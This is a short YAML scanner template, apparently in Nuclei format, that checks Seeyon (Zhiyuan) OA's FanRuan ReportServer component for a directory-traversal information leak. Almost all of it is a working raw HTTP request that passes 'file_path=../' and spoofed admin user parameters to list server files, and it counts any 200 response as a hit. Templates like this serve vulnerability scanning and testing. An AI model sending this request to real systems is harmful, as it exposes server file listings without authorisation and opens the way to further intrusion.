id: poc-yaml-zhiyuan-oa-fanruan-info-leak

info:
  name: poc-yaml-zhiyuan-oa-fanruan-info-leak
  author: xiaobaicai
  severity: medium
  tags: xray-converted,exposure,ct-469708
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20%E5%B8%86%E8%BD%AF%E7%BB%84%E4%BB%B6%20ReportServer%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html

http:
  - raw:
      - |
        GET /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200